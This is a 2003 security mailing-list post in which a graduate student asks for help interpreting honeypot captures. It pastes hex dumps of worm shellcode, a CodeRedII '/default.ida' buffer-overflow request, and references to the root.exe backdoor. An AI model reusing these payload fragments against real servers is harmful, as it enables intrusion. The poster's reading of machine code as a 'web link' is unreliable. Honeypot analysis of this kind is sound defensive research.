Security Basics mailing list archives
Need Help
From: Pat Garlick <patlg1 () netzero net>
Date: 19 Aug 2003 06:01:41 -0000
Hello: I've have some captured files from a Honeyd that was in operation back in May-June of this year. I launched this Honeyd as part of my Graduate Studies Project. The one thing that occurred frequently on this box was the attempted launch of a CodeRedII Worm and Buffer Over Flows. On these files is some other activity that I am not proficient enough to decipher what is going on. I am making some guesses that there was loading of files going on? I am posting this to find out if someone in this users group would be able to adequately provide information? I will be adding it to the paper that I have to write and I want to be as accurate as possible. If there is another users group that I should be submitting this to, let me know that as well. A small portion of one of the captured files I have pasted below. If it doesn't come through or is jumbled, let me know how I can submit it. I look forward to hearing from whoever soon with your help with this need. Thanks much, Pat. This was converted in a Hex Editor to text and binary. 54 0B 78 03 00 00 42 0C 00 3C 03 4B 45 52 4E 75 T.x...B..<.KERNu 00 00 7C 03 04 45 4C 33 32 75 00 33 00 49 00 72 ..|..EL32u.3.I.r 20 03 00 00 41 00 00 3C 03 47 65 74 50 75 00 00 ...A..<.GetPu.. 7C 03 04 72 6F 63 41 75 00 03 4A 10 49 00 00 03 |..rocAu..J.I... 4A 24 0F 00 0C 0B 00 00 02 03 4A 1C 00 04 0B 03 J$........J..... 00 00 44 24 24 64 67 00 06 00 00 58 61 00 00 51 ..D$$dg....Xa..Q 00 00 00 00 5D 00 00 45 00 00 0D 00 00 00 4C 6F ....]..E......Lo 61 64 4C 69 62 72 61 72 79 41 00 00 75 00 00 55 adLibraryA..u..U 00 00 45 00 00 0D 00 00 00 43 72 65 61 74 65 54 ..E......CreateT 68 72 65 61 64 00 00 75 00 00 55 00 00 45 00 00 hread..u..U..E.. 0D 00 00 00 47 65 74 54 69 63 6B 43 6F 75 6E 74 ....GetTickCount 00 00 75 00 00 55 00 00 45 00 00 06 00 00 00 53 ..u..U..E......S 6C 65 65 70 00 00 75 00 00 55 00 00 45 00 00 17 leep..u..U..E... 00 00 00 47 65 74 53 79 73 74 65 6D 44 65 66 61 ...GetSystemDefa 75 6C 74 4C 61 6E 67 49 44 00 00 75 00 00 55 00 ultLangID..u..U. 00 45 00 00 14 00 00 00 47 65 74 53 79 73 74 65 .E......GetSyste 6D 44 69 72 65 63 74 6F 72 79 41 00 00 75 00 00 mDirectoryA..u.. 55 00 00 45 00 00 0A 00 00 00 43 6F 70 79 46 69 U..E......CopyFi 6C 65 41 00 00 75 00 00 55 00 00 45 00 00 10 00 leA..u..U..E.... 00 00 47 6C 6F 62 61 6C 46 69 6E 64 41 74 6F 6D ..GlobalFindAtom 41 00 00 75 00 00 55 00 00 45 00 00 0F 00 00 00 A..u..U..E...... 47 6C 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 00 GlobalAddAtomA.. 75 00 00 55 00 00 45 00 00 0C 00 00 00 43 6C 6F u..U..E......Clo 73 65 48 61 6E 64 6C 65 00 00 75 00 00 55 00 00 seHandle..u..U.. 45 00 00 08 00 00 00 5F 6C 63 72 65 61 74 00 00 E......_lcreat.. 75 00 00 55 00 00 45 00 00 08 00 00 00 5F 6C 77 u..U..E......_lw 72 69 74 65 00 00 75 00 00 55 00 00 45 00 00 08 rite..u..U..E... 00 00 00 5F 6C 63 6C 6F 73 65 00 00 75 00 00 55 ..._lclose..u..U 00 00 45 00 00 0E 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst 65 6D 54 69 6D 65 00 00 75 00 00 55 00 00 45 00 emTime..u..U..E. 00 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 .....WS2_32.DLL. 00 55 00 46 00 3E 44 00 05 00 36 00 00 00 36 00 .U.F.>D...6...6. 00 00 00 06 25 5D 00 19 00 00 00 5F 00 2D 08 00 ....%]....._.-.. 2">..</he...>\...6...6.....%]....._.-..E..(.l..@..\....DUhB.P.q. ..X..~.P.>..T..ad>....<script> ..function Homepage(){..<!--..// in real bits, urls get returned to our script like this:..// res ://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm ...../ /For testing use DocURL = "res://shdocvw.dll/http_404.htm#https: //www.microsoft.com/bar.htm"...DocURL = document.URL;.......//th is is where the http or https will be, as found by searching for :// but skipping the res://...protocolIndex=DocURL.indexOf(":// ",4);......//this finds the ending slash for the domain server . ..serverIndex=D...>....6...6.....%]....._.-..E..(.m..@..[....DUh ........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGet Tf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P....B ....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j...P.E.P.E. P........<a...E...@...........).......E.j..E.P1.Qf..x.Q.E.P.E.P. This occurred just before the launch of the CodeRedII worm, a buffer overflow. I would like to know what is going on with \CMD.EXE and d:\inetpub\scripts\root.exe What is that file?: .@..d..GET/default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090% u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00 =a HTTP/1.0..Content-type: text/xml.Content-length: 3379 ...... ..`........dg.6..dg.&.......h......\...P.U...\...P.U..@.....X... .\........\CMD.EXE.^.....cj......d:\inetpub\scripts\root.exe...$ ....\...P.U...>?I..6...6.....%]....._.-..E..(....@.......DUhB.P. V.;.I.QuZP.>.$u.....>....N...N......_.-..%]....E..@.K@.j..dDUhB. ....V.P.QuZ.;.IP.@.#...bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u 6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078% u0000%u00=a HTTP/1.0..Content-type: text/xml.Content-length: 3379 One last portion below: 00 00 42 00 0E 01 01 01 01 01 01 01 70 00 42 01 ..B.........p.B. 70 00 42 00 00 00 00 00 00 00 00 68 00 00 00 42 p.B........h...B 00 01 01 01 01 31 00 00 18 50 00 00 35 01 01 01 .....1...P..5... 05 50 00 00 51 68 2E 64 6C 6C 68 65 6C 33 32 68 .P..Qh.dllhel32h 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 43 68 kernQhounthickCh 47 65 74 54 66 00 6C 6C 51 68 33 32 2E 64 68 77 GetTf.llQh32.dhw 73 32 5F 66 00 65 74 51 68 73 6F 63 6B 66 00 74 s2_f.etQhsockf.t 6F 51 68 73 65 6E 64 00 18 10 00 42 00 45 00 50 oQhsend....B.E.P 00 16 50 00 45 00 50 00 45 00 50 00 16 50 00 10 ..P.E.P.E.P..P.. 10 00 42 00 1E 00 03 3D 55 00 00 51 74 05 00 1C ..B....=U..Qt... 10 00 42 00 16 00 00 31 00 51 51 50 00 00 03 01 ..B....1.QQP.... 04 00 00 00 01 01 01 01 51 00 45 00 50 00 45 00 ........Q.E.P.E. 50 00 16 6A 11 6A 02 6A 02 00 00 50 00 45 00 50 P..j.j.j...P.E.P 00 45 00 50 00 16 00 00 09 00 00 00 3C 61 00 00 .E.P........<a.. 00 45 00 00 0C 40 00 14 00 00 00 04 01 00 00 00 .E...@.......... 08 29 00 00 04 00 01 00 00 45 00 6A 10 00 45 00 .).......E.j..E. 50 31 00 51 66 00 00 78 01 51 00 45 03 50 00 45 P1.Qf..x.Q.E.P.E 00 50 00 00 00 00 00 13 00 3E 77 00 0D 00 72 01 .P.......>w...r. 00 00 72 01 00 00 00 06 25 5D 00 19 00 00 00 5F ..r.....%]....._ 00 2D 08 00 45 00 01 64 00 6B 40 00 00 01 35 00 .-..E..d.k@...5. B........h...B.....1...P..5....P..Qh.dllhel32hkernQhounthickChGe tTf.llQh32.dhws2_f.etQhsockf.toQhsend....B.E.P..P.E.P.E.P..P.... B....=U..Qt.....B....1.QQP............Q.E.P.E.P..j.j.j..-..>.{.. I found out that Q.E.P.E.P is really a web link. There are several web links in all of the captured files with strange names. --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- Need Help Pat Garlick (Aug 19)